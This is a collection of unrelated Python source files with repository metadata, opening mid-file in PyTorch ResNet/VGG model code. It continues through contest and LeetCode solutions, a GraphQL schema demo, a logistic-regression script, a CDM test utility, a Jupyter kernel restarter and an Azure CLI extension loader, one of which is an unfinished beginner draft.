dx = self.activation(self.norm_1(self.conv_1(dx), seg))
out = x + dx
return out
def activation(self, x):
return F.leaky_relu(x, 2e-1)
# ResNet block used in pix2pixHD
# We keep the same architecture as pix2pixHD.
class ResnetBlock(nn.Module):
def __init__(self, dim, norm_layer, activation=nn.ReLU(False), kernel_size=3):
super().__init__()
pw = (kernel_size - 1) // 2
self.conv_block = nn.Sequential(
nn.ReflectionPad2d(pw),
norm_layer(nn.Conv2d(dim, dim, kernel_size=kernel_size)),
activation,
nn.ReflectionPad2d(pw),
norm_layer(nn.Conv2d(dim, dim, kernel_size=kernel_size)),
# add an activation
activation,
)
def forward(self, x):
y = self.conv_block(x)
out = x + y
return out
# VGG architecter, used for the perceptual loss using a pretrained VGG network
class VGG19(torch.nn.Module):
def __init__(self, requires_grad=False):
super(VGG19, self).__init__()
vgg_pretrained_features = torchvision.models.vgg19(pretrained=True).features
self.slice1 = torch.nn.Sequential()
self.slice2 = torch.nn.Sequential()
self.slice3 = torch.nn.Sequential()
self.slice4 = torch.nn.Sequential()
self.slice5 = torch.nn.Sequential()
for x in range(2):
self.slice1.add_module(str(x), vgg_pretrained_features[x])
for x in range(2, 7):
self.slice2.add_module(str(x), vgg_pretrained_features[x])
for x in range(7, 12):
self.slice3.add_module(str(x), vgg_pretrained_features[x])
for x in range(12, 21):
self.slice4.add_module(str(x), vgg_pretrained_features[x])
for x in range(21, 30):
self.slice5.add_module(str(x), vgg_pretrained_features[x])
if not requires_grad:
for param in self.parameters():
param.requires_grad = False
def forward(self, X):
h_relu1 = self.slice1(X)
h_relu2 = self.slice2(h_relu1)
h_relu3 = self.slice3(h_relu2)
h_relu4 = self.slice4(h_relu3)
h_relu5 = self.slice5(h_relu4)
out = [h_relu1, h_relu2, h_relu3, h_relu4, h_relu5]
return out
class VGGFace19(torch.nn.Module):
def __init__(self, opt, requires_grad=False):
super(VGGFace19, self).__init__()
model = torchvision.models.vgg19_bn(pretrained=False)
ckpt = torch.load(opt.vggface_checkpoint)['state_dict']
util.copy_state_dict(ckpt, model, 'module.base.')
vgg_pretrained_features = model.features
self.slice1 = torch.nn.Sequential()
self.slice2 = torch.nn.Sequential()
self.slice3 = torch.nn.Sequential()
self.slice4 = torch.nn.Sequential()
self.slice5 = torch.nn.Sequential()
for x in range(2):
self.slice1.add_module(str(x), vgg_pretrained_features[x])
for x in range(2, 7):
self.slice2.add_module(str(x), vgg_pretrained_features[x])
for x in range(7, 12):
self.slice3.add_module(str(x), vgg_pretrained_features[x])
for x in range(12, 21):
self.slice4.add_module(str(x), vgg_pretrained_features[x])
for x in range(21, 30):
self.slice5.add_module(str(x), vgg_pretrained_features[x])
if not requires_grad:
for param in self.parameters():
param.requires_grad = False
def forward(self, X):
h_relu1 = self.slice1(X)
h_relu2 = self.slice2(h_relu1)
h_relu3 = self.slice3(h_relu2)
h_relu4 = self.slice4(h_relu3)
h_relu5 = self.slice5(h_relu4)
out = [h_relu1, h_relu2, h_relu3, h_relu4, h_relu5]
return out
| [
"noreply@github.com"
] | opendr-eu.noreply@github.com |
726f81a2bbf5d4b11fa85cab9560e8742992fb7b | a0e895ec31d4b376c50e203b7a9c018c288d3287 | /hw2/random_sample_predict.py | ec22bad40ae53aa43ff9832041f1914c7f47e3ff | [] | no_license | eiahb3838ya/2018_ntu_machine_learning | 43c3885c6175c0f753d9597732b59986234c8360 | 256cfa806dc403dcc1b5eb51317cf4972de28787 | refs/heads/master | 2020-04-17T16:32:17.417827 | 2019-01-21T03:54:43 | 2019-01-21T03:54:43 | 166,744,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,117 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 25 15:50:15 2018
@author: eiahb
"""
#import scipy,pprint
#from pprint import pprint
import numpy as np
import pandas as pd
#import matplotlib.pyplot as plt
#from sklearn.metrics import log_loss
#import datetime
from my_class.common_function import *
from imblearn.over_sampling import SMOTE, ADASYN,RandomOverSampler
TRAIN_NUM=11
mylog=init_logging()
w_init=np.load("temp_W_b/lr_W_chanel2.npy")
b_init=np.load("temp_W_b/lr_b_chanel2.npy")
#load prework of train_x
raw_train_x=pd.read_csv("train_x.csv",encoding="big5")
train_x=prework_x(raw_train_x)
#load prework of train_y
raw_train_y=pd.read_csv("train_y.csv",encoding="big5")
train_y=raw_train_y
#load prework of test_x
raw_test_x=pd.read_csv("test_x.csv",encoding="big5")
test_x=prework_x(raw_test_x)
#reshape to fit model
train_x_np=np.array(train_x)
train_y_np=np.array(train_y)#.reshape(-1,)
test_x_np=np.array(test_x)
print("shape of train_x,test_x,train_y_np:",train_x_np.shape,test_x_np.shape,train_y_np.shape)
#resampling
#x_resampled, y_resampled = SMOTE().fit_resample(train_x_np, train_y_np)
#print("shape of X_resampled,y_resampled:",x_resampled.shape,y_resampled.shape)
#train_x=x_resampled.reshape(-1,train_x_np.shape[1])
#train_y=y_resampled.reshape(-1,1)
#print("shape of train_x,train_y:",train_x.shape,train_y.shape)
lr=Logistic_Regression_gradient()
lr.train(train_x_np,train_y_np,train_num=TRAIN_NUM,w_init=w_init,b_init=b_init,epochs=5000000,batch_size=120)
mylog.info("training done")
test_x_scaled=lr.feature_scaling(test_x_np)
lr.predict(test_x_scaled,train_num=TRAIN_NUM,result=True)
np.save("temp_W_b/lr_W_chanel2.npy",lr.W,)
np.save("temp_W_b/lr_b_chanel2.npy",lr.b,)
#last_W=lr.W
#last_b=lr.b
#mylog.debug("start train #"+str(TRAIN_NUM))
#lr.train(train_x_np,train_y_np,w_init=last_W,b_init=last_b,train_num=TRAIN_NUM,epochs=500000)
#test_x=lr.feature_scaling(test_x)
#last_W=lr.W
#last_b=lr.b
#lr.predict(test_x,result=True,train_num=TRAIN_NUM)
#W = np.zeros((train_x.shape[1], 1))
#np.dot(train_x,W)
#sigmoid_v = np.vectorize(sigmoid)
#sigmoid_v(np.dot(train_x,W))
| [
"eiahb3838ya@gmail.com"
] | eiahb3838ya@gmail.com |
6616f04e1e77a286e4ed8db783e1a8baec073a2c | c008898bf1adbba7110e0747343adbb3b01fc6c1 | /schema.py | e9c598f65df574c60c7bc23db3b509a9ea51aa43 | [] | no_license | gloompi/python-graphql | 45368fb3130dfc7d5e38614c59e638bb713706ee | 29ca5859027029f625196d13e232d3337f64ca36 | refs/heads/master | 2022-12-15T19:22:51.001813 | 2019-06-28T07:53:25 | 2019-06-28T07:53:25 | 194,230,911 | 0 | 0 | null | 2022-12-10T01:36:39 | 2019-06-28T07:46:37 | Python | UTF-8 | Python | false | false | 2,127 | py | import graphene
import json
import uuid
from datetime import datetime
class Post(graphene.ObjectType):
title = graphene.String()
content = graphene.String()
class User(graphene.ObjectType):
id = graphene.ID(default_value=str(uuid.uuid4()))
username = graphene.String()
created_at = graphene.DateTime(default_value=datetime.now())
avatar_url = graphene.String()
def resolve_avatar_url(self, info):
return f'https://cloudinary.com/{self.username}/{self.id}'
class Query(graphene.ObjectType):
users = graphene.List(User, limit=graphene.Int())
hello = graphene.String()
is_admin = graphene.Boolean()
def resolve_hello(self, info):
return 'world'
def resolve_is_admin(self, info):
return True
def resolve_users(self, info, limit=None):
return [
User(id="1", username="Kuba", created_at=datetime.now()),
User(id="2", username="Tina", created_at=datetime.now()),
User(id="3", username="Tiger", created_at=datetime.now())
][:limit]
class CreateUser(graphene.Mutation):
user = graphene.Field(User)
class Arguments:
username = graphene.String()
def mutate(self, info, username):
user = User(username=username)
return CreateUser(user=user)
class CreatePost(graphene.Mutation):
post = graphene.Field(Post)
class Arguments:
title = graphene.String()
content = graphene.String()
def mutate(self, info, title, content):
if info.context.get('is_anonymus'):
raise Exception('Not authenticated')
post = Post(title=title, content=content)
return CreatePost(post=post)
class Mutation(graphene.ObjectType):
create_user = CreateUser.Field()
create_post = CreatePost.Field()
schema = graphene.Schema(query=Query, mutation=Mutation)
result = schema.execute(
'''
{
users {
id
createdAt
username
avatarUrl
}
}
''',
# context={ 'is_anonymus': True }
# variable_values={'limit': 2}
)
print('ERROR', result.errors)
dictResult = dict(result.data.items())
print(json.dumps(dictResult, indent=2))
| [
"gloompi@gmail.com"
] | gloompi@gmail.com |
d869097b1775e96d604c69bdde7348b1eb27b9c8 | ec35df4cc4543f20bd6a1d30f244f67873ecd261 | /045.py | ef73f81e6668900eb23328f490879352303165db | [] | no_license | timsergor/StillPython | 02b6ddc3226cf8d27d8575ca36e75a19cfe6ac9d | 84b3b37bc165b9daf83cca78d577b5a927e483ec | refs/heads/master | 2020-05-24T09:34:14.819413 | 2020-04-19T13:35:06 | 2020-04-19T13:35:06 | 187,209,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | #202. Happy Number. Easy. 46%.
#Write an algorithm to determine if a number is "happy".
#A happy number is a number defined by the following process: Starting with any positive integer, replace the number by the sum of the squares of its digits, and repeat the process until the number equals 1 (where it will stay), or it loops endlessly in a cycle which does not include 1. Those numbers for which this process ends in 1 are happy numbers.
class Solution:
def isHappy(self, n: int) -> bool:
def next(n):
m = 0
while n > 0:
m += (n % 10)**2
n = n // 10
return(m)
if n == 1:
return(True)
char = {n:True}
while n != 1:
n = next(n)
if n == 1:
return(True)
elif n in char:
return(False)
else:
char[n] = True
# 15min
| [
"noreply@github.com"
] | timsergor.noreply@github.com |
a78d1316c681b645f01cafd9966a4bb424491802 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03660/s310524772.py | 3b5afbbf4eb0c248015cdabad9bc34a06be65a3e | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 956 | py | N=int(input())
E=[[] for i in range(N)]
for i in range(N-1):
x,y=map(int,input().split())
x-=1
y-=1
E[x].append(y)
E[y].append(x)
from collections import deque
BACK=[-1]*N
Q=deque([0])
while Q:
x=Q.pop()
for to in E[x]:
if BACK[to]==-1:
BACK[to]=x
Q.append(to)
ROAD=[N-1]
while ROAD[-1]!=0:
ROAD.append(BACK[ROAD[-1]])
LEN=len(ROAD)
COLOR=[-1]*N
QW=deque()
QB=deque()
for i in range(LEN//2):
COLOR[ROAD[i]]=1
QB.append(ROAD[i])
for i in range(LEN//2,LEN):
COLOR[ROAD[i]]=0
QW.append(ROAD[i])
SW=0
if LEN%2==1:
SW+=1
SB=0
while QW:
x=QW.pop()
for to in E[x]:
if COLOR[to]==-1:
COLOR[to]=0
SW+=1
QW.append(to)
while QB:
x=QB.pop()
for to in E[x]:
if COLOR[to]==-1:
COLOR[to]=1
SB+=1
QB.append(to)
if SW>SB:
print("Fennec")
else:
print("Snuke")
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
81b8771788890aa2f6794dde1f7552b4c07a80cd | b9b06d86d43e738b62ab9289fc13aae4c2b2670b | /weekend1/py0102/for1.py | 1f39b536774af0ab4e720cc81ddfe41afd787886 | [] | no_license | MrZhangzhg/nsd_2018 | 31a7a8d54e2cb3ff4f4eb5c736fbd76601718356 | 458a1fef40c5e15ba7689fcb3a00baf893ac0218 | refs/heads/master | 2020-04-08T19:08:48.237646 | 2019-09-08T04:31:07 | 2019-09-08T04:31:07 | 159,642,127 | 5 | 7 | null | 2019-01-04T05:33:40 | 2018-11-29T09:37:27 | Python | UTF-8 | Python | false | false | 550 | py | astr = 'tom'
alist = [10, 20]
atuple = ('tom', 'jerry')
adict = {'name': 'tom', 'age': 20}
# for ch in astr:
# print(ch)
#
# for i in alist:
# print(i)
#
# for name in atuple:
# print(name)
#
# for key in adict:
# print(key, adict[key])
# range函数
print(range(10))
print(list(range(10)))
for i in range(10):
print(i)
# range只有一个参数,表示结束数字,开始默认为0,但是结束数字不包含
print(list(range(6, 11)))
print(list(range(1, 11, 2))) # 2是步长值
print(list(range(10, 0, -1)))
| [
"zhangzg@tedu.cn"
] | zhangzg@tedu.cn |
4499443d25983a3ebaa681cf359a318a7170d7ea | 845d4102771a547dbc447f1d837b89a538f977b7 | /exerciciosComCondicionais/A_CONDICIONAIS/02A_EX12.py | 66f50bc2221fc6508059fec4ac2c14b7d8b00b06 | [] | no_license | TemistoclesZwang/Algoritmo_IFPI_2020 | 16e92d6f3e5e3f15ad573819cbd0171c5a5e3f5d | cc24657864985c3894ab738692807a01eab8d377 | refs/heads/main | 2023-08-23T02:57:58.838585 | 2021-10-05T16:18:14 | 2021-10-05T16:18:14 | 310,669,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | #12. Leia 1 (um) número inteiro e escreva se este número é par ou impar.
def main():
numero = int(input('Insira um número: '))
verificar(numero)
def verificar(numero):
if int(numero) % 2 == 0:
print ('É par')
else:
print ('É impar')
main()
| [
"temis2st@gmail.com"
] | temis2st@gmail.com |
a10ee01a362b58ba412f342306b973b06d970f6e | 27e18001bd40f6fe5b9f675130e359147ce3519a | /6_new.py | 936df46dcbdf08994dfeb8336bdb4e3656c3f653 | [] | no_license | jsomers/project-euler | 6934a5d4eb2c116b08face308a010ddb74e0c123 | 61cc4cd7978deeed9d071f678c786f991e05d8a7 | refs/heads/master | 2021-01-01T05:39:39.568380 | 2014-08-21T04:05:10 | 2014-08-21T04:05:10 | 10,680,061 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 195 | py | # Find the difference between the sum of the squares of the first one hundred natural numbers and the square of the sum.
print abs(sum([n ** 2 for n in range(1, 101)]) - sum(range(1, 101)) ** 2) | [
"jsomers@gmail.com"
] | jsomers@gmail.com |
cc81acf8488b435b9d734ab2d59a92a548f10506 | d93fe0484fc3b32c8fd9b33cc66cfd636a148ec4 | /AtCoder/diverta2/probB.py | c411fbc5ebeedd84ebac25443fcf3e2e2ee760b5 | [] | no_license | wattaihei/ProgrammingContest | 0d34f42f60fa6693e04c933c978527ffaddceda7 | c26de8d42790651aaee56df0956e0b206d1cceb4 | refs/heads/master | 2023-04-22T19:43:43.394907 | 2021-05-02T13:05:21 | 2021-05-02T13:05:21 | 264,400,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 977 | py | from operator import itemgetter
import numpy as np
import scipy.stats as stats
N = int(input())
xy = [list(map(int, input().split())) for _ in range(N)]
xy = sorted(xy, key=itemgetter(1))
xy = sorted(xy, key=itemgetter(0))
print(xy)
xy_a = np.array(xy)
x1 = xy_a[:, 0]
x2 = xy_a[:, 1]
def calc_mode(xi):
dl_a = np.diff(xi)
stats_c = stats.mode(dl_a)
maxcount = stats_c[1][0]
max = []
i = 0
while stats_c[1][i] == maxcount:
max.append(stats_c[0][i])
i += 1
if i > len(stats_c[1])-1:
break
return max
max0 = calc_mode(x1)
max1 = calc_mode(x2)
p0 = xy_a[0, 0]
q0 = xy_a[0, 1]
print(max0, max1)
Cost = N
for p in max0:
for q in max1:
deltaxy = []
for i in range(N):
deltaxy.append([p0+i*p, q0+i*q])
delta_array = xy_a[:-1, :]
cost = N - np.count_nonzero(np.all(delta_array - xy_a == 0, axis=1)) + 1
if cost < Cost:
Cost = cost
print(Cost) | [
"wattaihei.rapyuta@gmail.com"
] | wattaihei.rapyuta@gmail.com |
6f3964bde48bab7b7df6669392c64b4f61b28b9a | bb1d191123fc62504d048a80aec8e68000b98350 | /objectModel/Python/tests/cdm/projection/attribute_context_util.py | f6f4091ba5b0f0f9dad9000ae951fb3974926195 | [
"MIT",
"CC-BY-4.0"
] | permissive | SophieBok/CDM | abb7800add80a8962f8ae5e83f64742285dc0cec | d8df31fa455fcc6afd698e3ca7ec0f8c4a6716fd | refs/heads/master | 2023-06-28T08:18:55.025410 | 2021-07-29T22:17:49 | 2021-07-29T22:17:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,977 | py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import os
from typing import cast
from unittest import TestCase
from cdm.enums import CdmObjectType
from cdm.objectmodel import CdmEntityDefinition, CdmAttributeContext, CdmAttributeReference, \
CdmArgumentDefinition, CdmTraitReference, CdmCollection, CdmAttributeItem, CdmAttributeGroupDefinition, \
CdmTraitCollection
class AttributeContextUtil:
"""
Multiple test classes in projections test the attribute context tree generated for various scenarios.
This utility class helps generate the actual attribute context generated by the scenario, so that it can be compared with expected attribute context tree.
This also handles the validation of the expected vs. actual attribute context.
"""
def __init__(self):
# This string is used to concatenate all the attribute contexts and traits of an entity into one string
# so that we can compare it to the expected output txt file.
self._bldr = ''
def get_attribute_context_strings(self, resolved_entity: 'CdmEntityDefinition') -> str:
"""Function to get the attribute context string tree from a resolved entity"""
# clear the string builder
self._bldr = ''
# get the corpus path for each attribute context in the tree
self._get_content_declared_path(resolved_entity.attribute_context)
# get the traits for all the attributes of a resolved entity
self._get_traits(resolved_entity.attributes)
return self._bldr
def get_argument_values_as_strings(self, args: 'CdmArgumentDefinition') -> str:
# clear the string builder
self._bldr = ''
# get the corpus path for each attribute context in the tree
self._get_argument_values(args)
return self._bldr
def _get_content_declared_path(self, attrib_context: 'CdmAttributeContext') -> None:
"""Get the corpus path for each attribute context in the tree and build a string collection that we can
compare with the expected attribute context corpus path collection."""
if attrib_context and attrib_context.contents and len(attrib_context.contents) > 0:
for i in range(len(attrib_context.contents)):
content = attrib_context.contents[i]
self._bldr += content.at_corpus_path
self._bldr += '\n'
if not isinstance(content, CdmAttributeReference):
self._get_content_declared_path(content)
def _get_traits(self, attributes: 'CdmCollection[CdmAttributeItem]') -> None:
"""Get the traits for all the attributes of a resolved entity"""
for attrib in attributes:
attrib_corpus_path = attrib.at_corpus_path
self._bldr += attrib_corpus_path
self._bldr += '\n'
from cdm.objectmodel import CdmAttributeGroupReference
if isinstance(attrib, CdmAttributeGroupReference):
att_group_def = cast(CdmAttributeGroupReference, attrib).explicit_reference # type: CdmAttributeGroupDefinition
self._bldr += att_group_def.at_corpus_path
self._bldr += '\n'
self._get_trait_collection(att_group_def.exhibits_traits)
self._get_traits(att_group_def.members)
else:
self._get_trait_collection(attrib.applied_traits)
def _get_trait_collection(self, trait_collection: 'CdmTraitCollection') -> None:
for trait in trait_collection:
attrib_traits = trait.named_reference
self._bldr += attrib_traits
self._bldr += '\n'
if isinstance(trait, CdmTraitReference):
for args in trait.arguments:
self._get_argument_values(args)
def _get_argument_values(self, args: 'CdmArgumentDefinition') -> None:
param_name = args._resolved_parameter.name if args._resolved_parameter else None
param_default_value = args._resolved_parameter.default_value if args._resolved_parameter else None
if param_name or param_default_value:
self._bldr += ' [Parameter (Name / DefaultValue): {} / {}]'.format(param_name if param_name else '', param_default_value if param_default_value else '')
self._bldr += '\n'
if isinstance(args.value, str):
args_value = args.value
if args_value:
self._bldr += ' [Argument Value: {}]'.format(args_value)
self._bldr += '\n'
elif args.value.simple_named_reference == True if args.value else False:
args_value = args.value.named_reference
if args_value:
self._bldr += ' [Argument Value: {}]'.format(args_value)
self._bldr += '\n'
elif args.value.explicit_reference.object_type == CdmObjectType.CONSTANT_ENTITY_DEF if args.value else False:
const_ent = args.value.explicit_reference
if const_ent:
refs = []
for val in const_ent.constant_values:
self._bldr += ' [Argument Value: {}]'.format(','.join(val))
self._bldr += '\n'
@staticmethod
async def validate_attribute_context(test: 'TestCase', expected_output_path: str, entity_name: str, resolved_entity: 'CdmEntityDefinition', update_expected_output: bool = False) -> None:
"""A function to validate if the attribute context tree & traits generated for a resolved entity is the same
as the expected and saved attribute context tree & traits for a test case"""
if resolved_entity.attribute_context:
attr_ctx_util = AttributeContextUtil()
# Actual
actual_file_path = os.path.join(expected_output_path.replace('ExpectedOutput', 'ActualOutput'), 'AttrCtx_{}.txt'.format(entity_name))
# Save Actual AttrCtx_*.txt and Resolved_*.cdm.json
actual_text = attr_ctx_util.get_attribute_context_strings(resolved_entity)
with open(actual_file_path, 'w') as actual_attr_ctx_file:
actual_attr_ctx_file.write(actual_text)
await resolved_entity.in_document.save_as_async('Resolved_{}.cdm.json'.format(entity_name), False)
# Expected
expected_file_path = os.path.join(expected_output_path, 'AttrCtx_{}.txt'.format(entity_name))
if update_expected_output:
with open(expected_file_path, 'w') as expected_attr_ctx_file:
expected_attr_ctx_file.write(actual_text)
with open(expected_file_path) as expected_file:
expected_text = expected_file.read()
# Test if Actual is Equal to Expected
test.assertEqual(expected_text.replace('\r\n', '\n'), actual_text.replace('\r\n', '\n'))
| [
"cdm-publisher@outlook.com"
] | cdm-publisher@outlook.com |
01a51587d08e7eee45b2ac648941684c741f4abd | 8eab8ab725c2132bb8d090cdb2d23a5f71945249 | /virt/Lib/site-packages/jupyter_client/ioloop/restarter.py | 54f96af8d53a14c53abb5436c8a59c9e7b61c8f9 | [
"MIT"
] | permissive | JoaoSevergnini/metalpy | 6c88a413a82bc25edd9308b8490a76fae8dd76ca | c2d0098a309b6ce8c756ff840bfb53fb291747b6 | refs/heads/main | 2023-04-18T17:25:26.474485 | 2022-09-18T20:44:45 | 2022-09-18T20:44:45 | 474,773,752 | 3 | 1 | MIT | 2022-11-03T20:07:50 | 2022-03-27T22:21:01 | Python | UTF-8 | Python | false | false | 3,905 | py | """A basic in process kernel monitor with autorestarting.
This watches a kernel's state using KernelManager.is_alive and auto
restarts the kernel if it dies.
"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import asyncio
import time
import warnings
from traitlets import Instance
from zmq.eventloop import ioloop
from jupyter_client.restarter import KernelRestarter
from jupyter_client.utils import run_sync
class IOLoopKernelRestarter(KernelRestarter):
"""Monitor and autorestart a kernel."""
loop = Instance("tornado.ioloop.IOLoop")
def _loop_default(self):
warnings.warn(
"IOLoopKernelRestarter.loop is deprecated in jupyter-client 5.2",
DeprecationWarning,
stacklevel=4,
)
return ioloop.IOLoop.current()
_pcallback = None
def start(self):
"""Start the polling of the kernel."""
if self._pcallback is None:
if asyncio.iscoroutinefunction(self.poll):
cb = run_sync(self.poll)
else:
cb = self.poll
self._pcallback = ioloop.PeriodicCallback(
cb,
1000 * self.time_to_dead,
)
self._pcallback.start()
def stop(self):
"""Stop the kernel polling."""
if self._pcallback is not None:
self._pcallback.stop()
self._pcallback = None
class AsyncIOLoopKernelRestarter(IOLoopKernelRestarter):
async def poll(self):
if self.debug:
self.log.debug("Polling kernel...")
is_alive = await self.kernel_manager.is_alive()
now = time.time()
if not is_alive:
self._last_dead = now
if self._restarting:
self._restart_count += 1
else:
self._restart_count = 1
if self._restart_count > self.restart_limit:
self.log.warning("AsyncIOLoopKernelRestarter: restart failed")
self._fire_callbacks("dead")
self._restarting = False
self._restart_count = 0
self.stop()
else:
newports = self.random_ports_until_alive and self._initial_startup
self.log.info(
"AsyncIOLoopKernelRestarter: restarting kernel (%i/%i), %s random ports",
self._restart_count,
self.restart_limit,
"new" if newports else "keep",
)
self._fire_callbacks("restart")
await self.kernel_manager.restart_kernel(now=True, newports=newports)
self._restarting = True
else:
# Since `is_alive` only tests that the kernel process is alive, it does not
# indicate that the kernel has successfully completed startup. To solve this
# correctly, we would need to wait for a kernel info reply, but it is not
# necessarily appropriate to start a kernel client + channels in the
# restarter. Therefore, we use "has been alive continuously for X time" as a
# heuristic for a stable start up.
# See https://github.com/jupyter/jupyter_client/pull/717 for details.
stable_start_time = self.stable_start_time
if self.kernel_manager.provisioner:
stable_start_time = self.kernel_manager.provisioner.get_stable_start_time(
recommended=stable_start_time
)
if self._initial_startup and now - self._last_dead >= stable_start_time:
self._initial_startup = False
if self._restarting and now - self._last_dead >= stable_start_time:
self.log.debug("AsyncIOLoopKernelRestarter: restart apparently succeeded")
self._restarting = False
| [
"joao.a.severgnini@gmail.com"
] | joao.a.severgnini@gmail.com |
7765ceccb21016a4bb1507aef9301ffcf28ddf22 | 9d123c6b87b0baf80a6fce070023e19d68048b90 | /slothql/utils/laziness.py | 1a0de52539dcd75a2ec5e2830f3abfe6a44fd19b | [
"MIT"
] | permissive | IndioInc/slothql | ea4da3727cb974360eeb3b38517ead4328687e81 | 64a574013e249968746044555bd8779ac353b13f | refs/heads/master | 2021-05-08T11:07:34.420797 | 2018-04-14T02:08:55 | 2018-04-14T02:08:55 | 119,881,523 | 2 | 0 | MIT | 2018-04-15T01:31:10 | 2018-02-01T19:16:50 | Python | UTF-8 | Python | false | false | 1,160 | py | lazy_proxy_attrs = ['_LazyInitProxy' + i for i in ('__obj', '__new', '__cls', '__args', '__kwargs', '__lazy_init')]
class LazyInitProxy:
def __init__(self, new, cls, *args, **kwargs):
self.__obj = None
self.__new = new
self.__cls = cls
self.__args = args
self.__kwargs = kwargs
def __lazy_init(self):
if not self.__obj:
self.__obj = self.__new(self.__cls)
self.__obj.__init__(*self.__args, **self.__kwargs)
def __getattribute__(self, name):
if name is '__class__':
return self.__cls
if name in lazy_proxy_attrs:
return super().__getattribute__(name)
self.__lazy_init()
return type(self.__obj).__getattribute__(self.__obj, name)
def __setattr__(self, key, value):
if key in lazy_proxy_attrs:
return super().__setattr__(key, value)
self.__lazy_init()
return type(self.__obj).__setattr__(self.__obj, key, value)
class LazyInitMixin:
@staticmethod
def __new__(cls, *args, **kwargs):
return LazyInitProxy(super(LazyInitMixin, cls).__new__, cls, *args, **kwargs)
| [
"karol.gruszczyk@gmail.com"
] | karol.gruszczyk@gmail.com |
c6924b59c81ca5e1180e6818f3e2b742947490af | c50e7eb190802d7849c0d0cea02fb4d2f0021777 | /src/spring-cloud/azext_spring_cloud/__init__.py | f1f6829e24f83bb03b037a169d016f4c6295b128 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | Azure/azure-cli-extensions | c1615b19930bba7166c282918f166cd40ff6609c | b8c2cf97e991adf0c0a207d810316b8f4686dc29 | refs/heads/main | 2023-08-24T12:40:15.528432 | 2023-08-24T09:17:25 | 2023-08-24T09:17:25 | 106,580,024 | 336 | 1,226 | MIT | 2023-09-14T10:48:57 | 2017-10-11T16:27:31 | Python | UTF-8 | Python | false | false | 1,614 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core import AzCommandsLoader
from azure.cli.core.commands import CliCommandType
from azext_spring_cloud._help import helps # pylint: disable=unused-import
from azext_spring_cloud._client_factory import cf_spring_cloud
from azext_spring_cloud.commands import load_command_table
from azext_spring_cloud._params import load_arguments
class spring_cloudCommandsLoader(AzCommandsLoader):
def __init__(self, cli_ctx=None):
spring_cloud_custom = CliCommandType(
operations_tmpl='azext_spring_cloud.custom#{}',
client_factory=cf_spring_cloud)
super(spring_cloudCommandsLoader, self).__init__(cli_ctx=cli_ctx, custom_command_type=spring_cloud_custom)
def load_command_table(self, args):
from azure.cli.core.aaz import load_aaz_command_table
try:
from . import aaz
except ImportError:
aaz = None
if aaz:
load_aaz_command_table(
loader=self,
aaz_pkg_name=aaz.__name__,
args=args
)
load_command_table(self, args)
return self.command_table
def load_arguments(self, command):
load_arguments(self, command)
COMMAND_LOADER_CLS = spring_cloudCommandsLoader
| [
"noreply@github.com"
] | Azure.noreply@github.com |
20e79c2fadd832d61fd5bea20ef637c8f7e01edc | 53e4a89e8baeb715f10b33304be028e906e58583 | /practice.py | d434fefa456bfbb3d8eb507660a7137ff77e4ce5 | [] | no_license | eodnjs467/python | 9a9cf2c82a6c64d839c4de4bc38fe3df14f11f5d | 67b2a770526f4c4161bcf06042eea3054a30b3fc | refs/heads/master | 2020-09-30T20:33:51.627921 | 2020-04-12T15:13:47 | 2020-04-12T15:13:47 | 227,368,131 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | import itertools
def solution(M, load):
a=[]
count = 0
M = input("트럭에 실을 수 있는 최대 무게를 설정해주세요.")
if M>40: print("40이하로 입력하세요")
load = input("[1,2,3,4,5,6] 처럼 입력하세요 최대 12개 ")
for index in range(len(load)):
if load[index] > 12:
print("12이하로 설정하세요")
count = count+1
if count == len(load):
return -1
a.append(load[index])
b = itertools.combinations(a,2)
c = list(b)
for i in range(1):
for j in range(1):
middle = 40 - (c[i][j] + c[i][j+1])
middle = ## 0에 가까운 걸 찾아야함
# load_max = 40
# min = 0
answer = 0
return answer | [
"sponjjanc@naver.com"
] | sponjjanc@naver.com |
48dafa5e87dcad260228db02752c101b9cd39502 | eae6dddca9285702c4c7ed6ba6bdaceef9631df2 | /CCC-2018/Senior/Senior-1/S1.py | a7e1fce447c03ec8b63cb22e911da9b2757d0261 | [] | no_license | simrit1/CCC-Solutions-2 | 7823ce14801c4219f6f1dd4c42fb013c2dfc45dd | ee2883aa38f933e526ce187d50ca68763876cb58 | refs/heads/master | 2023-07-04T02:19:37.320261 | 2021-08-07T22:12:36 | 2021-08-07T22:12:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 710 | py | # CCC 2018 Senior 1: Voronoi Villages
#
# Author: Charles Chen
#
# Arrays and calculations
# Initialize variables
min_size = 20000000000
size_left = 0
size_right = 0
total_size = 0
# Input
points = []
num_villages = int(input())
for i in range(num_villages):
points.append(int(input()))
# Sort the points
points.sort()
# Find smallest neighbourhood size
for i in range(1, num_villages - 1):
diff_left = points[i] - points[i-1]
diff_right = points[i+1] - points[i]
size_left = diff_left / 2
size_right = diff_right / 2
total_size = size_left + size_right
if total_size < min_size:
min_size = total_size
print("{:.1f}".format(min_size))
| [
"noreply@github.com"
] | simrit1.noreply@github.com |
